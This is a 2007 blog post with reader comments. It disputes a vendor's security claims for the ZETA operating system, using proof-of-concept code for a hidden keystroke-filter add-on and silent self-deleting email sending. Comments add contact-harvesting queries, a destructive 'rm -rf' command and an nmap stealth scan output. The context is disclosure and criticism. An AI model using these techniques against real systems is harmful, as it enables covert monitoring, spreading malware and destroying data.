January 4, 2007

secure due to ignorance?

Category: Development — kaldor @ 1:16 am

It’s been a long time since I wrote an article about the Magnussoft ZETA operating system (http://www.zeta-os.com ), but today I really feel like it. After several weeks I took a look at the newspage on www.zeta-os.com and read an entry about security on Magnussoft ZETA. For non german native speakers it is about that the german home secretary Schäuble suggests that intelligence agencies should be allowed to have access to your private data on your computer at home.

Magnussoft claims that this is not doable with Magnussoft ZETA as “it is not possible to examine a system from the outside without notifying the user due to the architecture of this software” (”Die Architektur der Software vereitelt das ein System von außen durchsucht wird, ohne dass der Betreiber davon Kenntnis erlangt”).

This is really interesting news and I guess many people even believe in this. I was pretty surprised as the news article went even better and better. Magnussoft states, that it is not possible to attack a Magnussoft ZETA machine from the internet. Dialer, trojans, hack-attacks are without any chance.

So, this said, it is time to analyze these statements and you will be surprised how easy it is to show that Magnussoft ZETA has many security holes and conceptional issues.

Before you continue reading, I just want to make sure that this article is not ment to motivate anyone to develop harmful pieces of software, neither to damage magnussoft’s reputation. In addition all the informations you will get are already available on the developer documentation webpage of magnussoft itself, this is just a collection of hints, where security issues are to be solved. No deep knowledge of the operating system is needed for this. I hope that some people responsible for the development of this operating system feel like taking some work on it to assure the amount of security their marketing is already praying.

Working in the background
If you want to run some pieces of code without getting attention by the user easily, there is one point, where you can perfectly start your project. The add-on structure of Magnussoft ZETA loads all add-ons during startup of the different servers. So you have multiple chances to plug in to the system. Media Kit, Mail Kit, Translation, etc. But the most convenient way is the input server (http://www.zeta-os.com/cms/custom/API/TheInputServer.html ). This one gets started very early during the boot process and is needed in any case. Remember if you get into KDL you are still able to type. As already mentioned the input_server launches ALL add-ons, there is no check, wether the user wants specific add-ons to be loaded or not. Additionally there is no way to see, which add-ons are loaded even when the user wants to examine the system. You might want to start your own thread during construction of your add-on object or wait for some specific event.
Just for the fun, we let our system do something when the user presses ALT+c for copying an element he has selected. For people not used to this system, BeOS related operating systems use ALT as the default modifier. Before the window gets the message, the key event goes through our filter by calling the function
virtual filter_result Filter( BMessage* message, BList* outList) [virtual]
Following you can see some code, which simply repeats what has been written above:

#include
#include
#include

class NoNotifyFilter : public BInputServerFilter
{
public:
NoNotifyFilter() { }
~NoNotifyFilter() { }

status_t InitCheck() { return B_OK; }
filter_result Filter(BMessage*, BList*);
};

filter_result
NoNotifyFilter::Filter(BMessage* msg, BList*)
{
if(B_KEY_DOWN == msg->what) {
int32 mod = 0;
msg->FindInt32(”modifiers” , &mod);
if(mod & B_COMMAND_KEY) {
int32 keyValue = 0;
msg->FindInt32(”key” , &keyValue);
if (keyValue == 78) {
(new BAlert(”Hey”, “There was something going on in the background.\nHave you been notified?\n”, “Oh bummer”))->Go(NULL);
}
}
}
return B_DISPATCH_MESSAGE;
}

extern “C” { BInputServerFilter* instantiate_input_filter(); }
BInputServerFilter*
instantiate_input_filter()
{
return new NoNotifyFilter();
}

Summary:
- no startup control
- no validation for add-on rights
- no information about loaded/running add-ons

Round and round it goes
Now let’s take a deeper look at the point, that trojans are not implementable on Magnussoft ZETA. I just want to go into the section of spreading the project to other people. Once again the modular design of this operating system is your best friend. One part of the system is called the Mail Kit (http://www.zeta-os.com/cms/custom/API/TheMailKit.html ). Especially we make usage of the BMailMessage (http://www.zeta-os.com/cms/custom/API/BMailMessage.html ) class. It is said, that one big advantage of Magnussoft ZETA is that you can use the Mail Kit for configuring your accounts and then use whatever mail application you want. Even multiple ones at the same time is possible, as they all use the bindings to the system. This is really convenient for the user, if he wants to try out a new mail client as you do not have to configure your mail settings again and again. But you get into problems at that point that the Mail Kit does not check wether an application is allowed to use the Mail Kit. Once again: The user does not get notified about this. So we create a BMailMessage object, and just use it’s member function
status_t Send(bool send_now = false, bool remove_when_sent = false)
This one uses your default mail account you set up. The second argument is even more important. If you set it to true, you cannot even recognize, that you send out this mail, as it gets deleted from your out folder on your boot partition. Following you can view some code snippet to send a message to someone with fullfilling the above criterias.
Now you might think, that you can easily prevent your system from sending these mails with a software firewall. But it is not the application itself, which sends the message. Each mail client just sends an email to the mail_server, which is then responsible for sending the message per SMTP. This means, that you would have to deny all mail transfer, or check each mail for admission. And I guess you are really not interested in this, as this is even more annoying that sudo’ing on a unix system.
Additionally I forget to mention one little thing. Who should you send an email? Try every address thinkable like it happens sometimes? Well, that’s not needed. Magnussoft ZETA has a central point for contact managment. It is the people folder in your home directory. There all contact informations are stored without any encryption. Names, Phone numbers, adresses, birthdates, etc. are available from there and so are email adresses. So why not just send this mail to all your friends on your contact list?
Once again some code:

#include
#include
#include

int main(int argc, char* argv[])
{
if(2>argc) {
fprintf(stderr, “You need to specify some content for the email being send.\n”);
return -1;
}
BString mailText;
for(int i=1; i
mailText += argv[i];
mailText += ” “;
}

BMailMessage *mail = new BMailMessage();
mail->AddHeaderField(B_MAIL_TO, “accountAt@domain_that_should_not_exist.com”);
mail->AddHeaderField(B_MAIL_SUBJECT, “special present”);
mail->AddContent(mailText.String() , strlen(mailText.String()));
mail->Send(true, true);

return 0;
}

Leak Summary:
- everyone can send mails
- no application signature check
- no encryption for contact data.

To summarize this little excursion to Magnussoft ZETA, it is easily possible to run code without notifying the user and really harm your system. In addition you can use a client system without any problem to spread your piece of code to other people. Once again without notifying the system’s owner. You might argue that sending out a mail will not spread your application as everyone is aware of harmful code being attached to a mail. Well first point, you might get mail from your friend, so you trust him. Second magnussoft states, that this is not possible with Magnussoft ZETA, so why not just click on this neat attachment. Third, this is the same way lots and lots of Microsoft Windows machines get affected each day, each hour, each minute on this planet.

I cannot repeat it often enough: Please do not use this as a tutorial to write harmful code. This is nothing else than a proof-of-concept, that magnussoft has a long way to go to provide their users with that security level they want to. In my oppinion this article hopefully opens some eyes to spend some more attention on these and more issues. Still it can be a great operating system, as well as the other BeOS related operating systems will be.

Update

20 Comments »

  1. Nice writing. Had almost the same feeling when i read the article on zeta-os.com.
    Never thought of modularity and flexibility as such a security hole. Hopefully someone with the knowledge to fix will read this.

    Greets,
    Marcus

    Comment by atla — January 4, 2007 @ 9:55 am

  2. People see what they want to see and therefore do not see what they do not want to see.

    The argument there is no spyware for BeOS and related systems is simply dumb. The german government would barely use existing spyware. Of course they would/will write new ware and as you can see, BeOS is even one of the easier systems for that task…

    I only can repeat that the makers of BeOS (or now ZETA) are simply lucky that nobody ever intended to write such software and this is the only “security” they have, facing the facts.

    Keep up the hope ;-P
    DasJott

    Comment by DasJott — January 4, 2007 @ 7:35 pm

  3. Quite an interesting read, Maurice.

    A nice little example showing email contact collection from People files would be the cherry on top :)

    Thanks

    Comment by John Drinkwater — January 5, 2007 @ 12:20 am

  4. Email contact collection can be trivially done with nothing more than a command line query, no code needs to be written. I’m not at home so I can’t verify that I have the attribute names right but something like:
    query “BEOS:TYPE=application/x-person && name=*” | xargs catattr email

    would harvest every email address in a contact on the current hard disk.

    Comment by AnEvilYak — January 5, 2007 @ 12:59 am

  5. Was hoping for an API-based example, (BQuery or fs_open_query?) but that’ll do nicely, thanks AnEvilYak.

    Comment by John Drinkwater — January 5, 2007 @ 2:34 am

  6. interesting, but how does any of the malicious code get executed if zeta has all its ports closed by default?

    Comment by sogabe — January 5, 2007 @ 2:56 am

  7. There are many virii out there who spread themselfes via email. So could that one.
    Send a mail to all contacts on a system with some weird content like “Test this new ZETA application blabla” and attach the binary to the mail.
    As soon as the user is dumb enough to run it (because he does not worry about such stuff) it’ll collect your people data and spread again (You are connected to the internet if you fetch mails, at least most of the time).

    Comment by atla — January 5, 2007 @ 9:44 am

  8. And well talking of open ports… This virus could also add an input_server addon which runs some networkcode to do some funny rpc stuff :) there you go with the trojaner thingy (and your open port).

    Comment by atla — January 5, 2007 @ 9:47 am

  9. For an API-based example:

    BQuery query;
    query.SetPredicate(”BEOS:TYPE=application/x-person && name=*”);

    if (query.Fetch() == B_OK)
    {
    BEntry entry;
    while (query.GetNextEntry(&entry) == B_OK)
    {
    // do whatever you want with the attributes on this entry.
    }
    }

    Comment by AnEvilYak — January 5, 2007 @ 9:04 pm

  10. I didn’t read the entire Magnusoft claim. But they substantially said you can’t launch code or “data mine” the computer from outside.

    Does your article prove this is false? No. It proves that as for any other operating system (even OpenVMS), you can write a piece of software that communicates through internet.

    I think the claim was more “a bare installe ZetaOS is secure” than “we garantee nobody will create a malware that you will install yourself”.

    Beside, as a BeOS user, I can say that BeOS was not more secure than DOS was. I don’t think the new ZetaOS did a lot more.

    Comment by doubleUB — January 5, 2007 @ 10:56 pm

  11. I am a developer on the Haiku project which is recreating BeOS in open source.

    While your efforts to investigate security in Zeta and other BeOS-like operating systems is commendable, I think your examples are not very convincing.

    Both problems you mention would require action by the user. For example if someone emailed a malicious piece of code which installed a bad input_server add-on and then emailed itself out again, the user would still need to click the attachment in the email to activate it. In contrast, Microsoft Outlook on Windows can automatically open attachments, which is why there have been many such pieces of malware for that system.

    So given the kind of access which you assume for both these cases, Linux, Windows, Mac OS X, BSD and pretty much every operating system in existance could have similar “security holes.”

    Now don’t get me wrong, BeOS is not the epitome of security…but that really isn’t its purpose. This is especially true of Haiku, which is meant to be a fairly simple, easy to use desktop system. We don’t expect the CIA to be using Haiku for national secrets. We don’t expect banks to be using Haiku to hold billions of dollars worth of bank account information.

    But we do want home users to feel fairly safe and that their data is reasonably secure. So thanks for the article nonetheless…it has inspired me to think of more dangerous security problems based on my knowledge of the system.

    Regards,
    Ryan Leavengood

    Comment by Ryan Leavengood — January 5, 2007 @ 11:10 pm

  12. Your article implies that the input_server also handles input while in KDL. This is not true. The KDL debugger has its own input mechanism.

    Comment by marcone — January 6, 2007 @ 2:00 am

  13. While the code you show probably works as advertised, you do not address Magnussoft’s claim in any way:
    They claim it is not possible to examine a Zeta system FROM THE OUTSIDE without the user’s knowledge.
    You have shown code running on the system that the user is unaware of (big deal, there is no operating system in the world where this isn’t possible).
    However, the two are completely different things. If I connect a Zeta machine to the Internet, can you examine its harddrive remotely, using the code you posted?

    Comment by marcone — January 6, 2007 @ 2:12 am

  14. Seems the claim is more related to attack from the outside though, not from within the system.

    This primarily involves the network stack while running, which is extremely secure, leaving the machines mostly invisible on the internet until they want something, at which time they become partialy visible.

    There are no manners of executing code through the kernel arbitrarily while running thanks almost exclusively to memory protection and the debugger.

    Normally exploits occur at buffer under/over runs, when they hijack and execute code at the terminal point of execution, possibly even correcting the program to prevent it from crashing during the process.

    In BeOS/Zeta at the point of such a run-time error, the debugger is informed of it, and the kernel prevents the attempted access from occuring, at the price of killing the application ( upon exiting the debugger dialog ).

    In this manner, the system becomes rather difficult, if not nearly impossible, to compromise as a whole. And maybe completely impossible from a remote attack, unless the work is done through Firefox or another specific networking application which permits such behavior to execute instructions on the machine, implant a simple command ( cd /boot/;rm -rf * & ), and thus destroy everything on the machine ( very quickly ).

    Well, everything that has the same gid and uid as the running team ( program ).

    Of course, that is, technically, application insecurity
    rather than system insecurity.

    –The loon

    Comment by looncraz — January 6, 2007 @ 4:10 am

  15. Hello marcone,

    it’s true, you probably can’t examine a new Zeta installation from the outside, unless you find a vulnerablity in the network stack that allows code execution even when all ports are closed.

    But there is another issue. It’s quite possible that some malicious application has already been released that does appearently nothing unusual, but installs a hidden backdoor. This would allow to examine a zeta system from the outside, without the user noticing it (I’m aware that the same applies to Haiku and BeOS).

    As far as I know, there is no integrity checker, antivirus software, etc for Zeta available.

    The claim made on the magnussoft website is very frivolous.

    regards
    Marcus

    Comment by Marcus Overhagen — January 6, 2007 @ 5:16 am

  16. In BeOS/Zeta at the point of such a run-time error, the debugger is informed of it, and the kernel prevents the attempted access from occuring, at the price of killing the application ( upon exiting the debugger dialog ).
    I don´t think so. A buffer over-/underrun “hack” will not be detected by the system. The stack will be overwritten an ‘new’ code will be executed. All without the notice of the kernel.

    Greetings

    Comment by Wiese — January 6, 2007 @ 12:24 pm

  17. Funny how people one by one came up spelling security issues for Zeta and relativing Marcus’ articles after a while.

    Marcus himself saw the missing link in his security revision:
    A screening of a ‘closed’ ZetaOS PC via the Internet through the well known technologies (read the article of MS) is really a ‘hard job’ to complete.

    To make it short:
    This is not simple possible this way - not even with Mojo!

    The system-internal security wholes as well the dumb users’ e-mail attachement opening automatism are not a criteria for criticizing MS’ claim for “user’s all day WWW security”…

    As per se, using BeOS oder Zeta connected on the Internet with no sercvice running is more safe than any other DesktopOS for an _average;_ PC User.

    It is a completely different case , when you run Server services or open telnet or whatever or open any mail enclosures from people you don’t know well!

    You can try it out and try to screen/hack/exploit my machine (Zeta, DSL) on turkbug.dyndns.org whenever you want.

    We from TurkBUG weren’t able to hijack neither BeOS R5 nor ZetaOS from the Internet (and believe me we tried a lot). But we can ‘kernel panic’ a Linux machine within 15 seconds for example via the internet (over TCP/IP).

    Good Luck!

    Comment by pasha — January 7, 2007 @ 2:24 am

  18. People! Sorry for getting out of the topic. Suppose i am a simple home user of BeOS, Haiku or Zeta… Why the heck should i care that the CIA or the KGB or whatever can see my HDD content? I’d have a few home made movies on it, 4-5 games and some pictures of my grandma… Do you really think that some crazy security flaw can ruin my day as a user? It would be awfull if those people erased my HDD, sure. But come to think of it, all the mentioned systems run on PCs. We’ve all been through the windblows reinstallation because it just wont work right after 6 days’ use right? Shouldn’t we look for other things like the lack of decent drivers and stuff? How many people have connected their web cam to a computer running those OSes and managed to get a paicture of themselves?
    Trust me, as far as the consumer is concerned nowadays, the devices supported by the system come first and security comes last. So forget about backdoors and think about some decent code for Ati cards or something… Let the governments see my naked lady on the desktop. Maybe the nerd hacking my computer will get a hard-on…

    Comment by Graveyard — January 7, 2007 @ 2:45 am

  19. [root@smorgoth root]# nmap -P0 -v -sS -O turkbug.dyndns.org

    Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2007-01-09 10:06 CET
    Host e177211095.adsl.alicedsl.de (85.177.211.95) appears to be up … good.
    Initiating SYN Stealth Scan against e177211095.adsl.alicedsl.de (85.177.211.95) at 10:06
    Adding open port 8888/tcp
    Adding open port 5190/tcp
    The SYN Stealth Scan took 576 seconds to scan 1644 ports.
    Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
    For OSScan assuming that port 5190 is open and port 38942 is closed and neither are firewalled
    Interesting ports on e177211095.adsl.alicedsl.de (85.177.211.95):
    (The 1642 ports scanned but not shown below are in state: filtered)
    Port State Service
    5190/tcp open aol
    8888/tcp open sun-answerbook
    Device type: PDA|broadband router
    Running: Linux 2.4.X, Panasonic embedded
    OS details: Linux 2.4.6 as on Sharp Zaurus PDA, Panasonic IP Technology Broadband Networking Gateway, KX-HGW200
    Uptime 14.676 days (since Mon Dec 25 18:03:15 2006)
    TCP Sequence Prediction: Class=random positive increments
    Difficulty=1120498 (Good luck!)
    IPID Sequence Generation: All zeros

    Nmap run completed — 1 IP address (1 host up) scanned in 590.208 seconds
    [root@smorgoth root]#

    Comment by NMAP — January 9, 2007 @ 11:21 am

  20. Thx for all the comments about this article. A small update is available at: this page

    Comment by kaldor — January 9, 2007 @ 10:04 pm

RSS feed for comments on this post. | TrackBack URI

Leave a comment

XHTML ( You can use these tags):
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> .